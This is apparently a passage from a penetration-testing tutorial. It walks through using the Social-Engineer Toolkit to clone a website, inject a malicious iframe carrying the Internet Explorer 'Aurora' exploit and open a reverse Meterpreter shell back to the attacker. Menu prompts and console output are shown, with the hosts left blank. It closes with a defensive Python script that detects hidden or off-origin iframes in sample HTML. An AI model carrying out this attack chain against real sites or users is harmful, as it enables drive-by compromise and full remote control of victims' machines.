The Social-Engineer Toolkit


SET supports both HTTP and HTTPS
 Enter the url to clone:


Select Website Attack Vectors from the SET main menu, and then The Metasploit Browser Exploit Method. Then select the Site Cloner option, and enter as the website you want to use for cloning.

Once the site is cloned, we’ll set up the exploit to trigger when a target browses the site.

Enter the browser exploit you would like to use

 16. Microsoft Internet Explorer "Aurora"

Enter your choice (1-23) (enter for default): 


What payload do you want to generate:

Name:                                      Description:

2. Windows Reverse_TCP Meterpreter         Spawn a meterpreter shell on victim and send back to attacker.

 Enter choice (example 1-10) (Enter for default):


Enter the port to use for the reverse (enter for default):

[*] Cloning the website:
[*] This could take a little bit...
[*] Injecting iframes into cloned website for MSF Attack....
[*] Malicious iframe injection successful...crafting payload.
[*] Launching MSF Listener...
[*] This may take a few to load MSF...                                                                               

resource (src/program_junk/meta_config)> exploit -j
[*] Exploit running as background job.
msf exploit(ms10_002_aurora) >
[*] Started reverse handler on
[*] Using URL:
[*]  Local IP: http://
[*] Server started.

To complete the attack setup, select the client-side exploit you wish to use. Above, we choose the infamous Internet Explorer Aurora exploit and accept the default reverse Meterpreter payload by pressing

When the target reaches , the site looks normal, but his system is compromised through an iframe injection. SET automatically rewrites the site to contain the iframe that houses the Metasploit client-side

Back at the attacking machine, we see that the attack is successful. The Meterpreter session has established the connection from the target to the attacking machine, and we have full access to the system, as shown here.
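
From the defender's side, the iframe injection described above can be caught by auditing a served page for frames that point off-origin or are rendered invisibly. The following is an added example, not code from SET or from the original text; it assumes the injected frame is hidden and loads from a different host than the page, and the URLs and HTML are constructed sample data.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)

class IframeAudit(HTMLParser):
    """Collect <iframe> tags that are off-origin or rendered invisibly."""

    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.page_host = urlparse(page_url).hostname
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k: (v or "").strip() for k, v in attrs}
        # Resolve relative src values against the page URL before comparing hosts.
        src = urljoin(self.page_url, a.get("src", ""))
        reasons = []
        if urlparse(src).hostname != self.page_host:
            reasons.append("off-origin src")
        if a.get("width") in {"0", "1"} or a.get("height") in {"0", "1"}:
            reasons.append("zero/one-pixel size")
        if HIDDEN_STYLE.search(a.get("style", "")):
            reasons.append("hidden by style")
        if reasons:
            self.findings.append((src, reasons))

def audit_iframes(html, page_url):
    """Return a list of (resolved_src, reasons) for every suspicious iframe."""
    parser = IframeAudit(page_url)
    parser.feed(html)
    parser.close()
    return parser.findings

# Constructed sample page (not SET output): one legitimate frame, one injected-style frame.
SAMPLE_URL = "https://intranet.example/index.html"
SAMPLE_HTML = """
<html><body>
<h1>Welcome</h1>
<iframe src="/help/widget.html" width="600" height="400"></iframe>
<iframe src="http://192.0.2.10:8080/" width="0" height="0" style="visibility:hidden"></iframe>
</body></html>
"""

if __name__ == "__main__":
    for src, reasons in audit_iframes(SAMPLE_HTML, SAMPLE_URL):
        print(f"SUSPICIOUS iframe -> {src}: {', '.join(reasons)}")
```

Run against proxy-captured responses or a crawl of your own sites, a check like this flags a page whose visible content is unchanged but which carries an extra hidden frame.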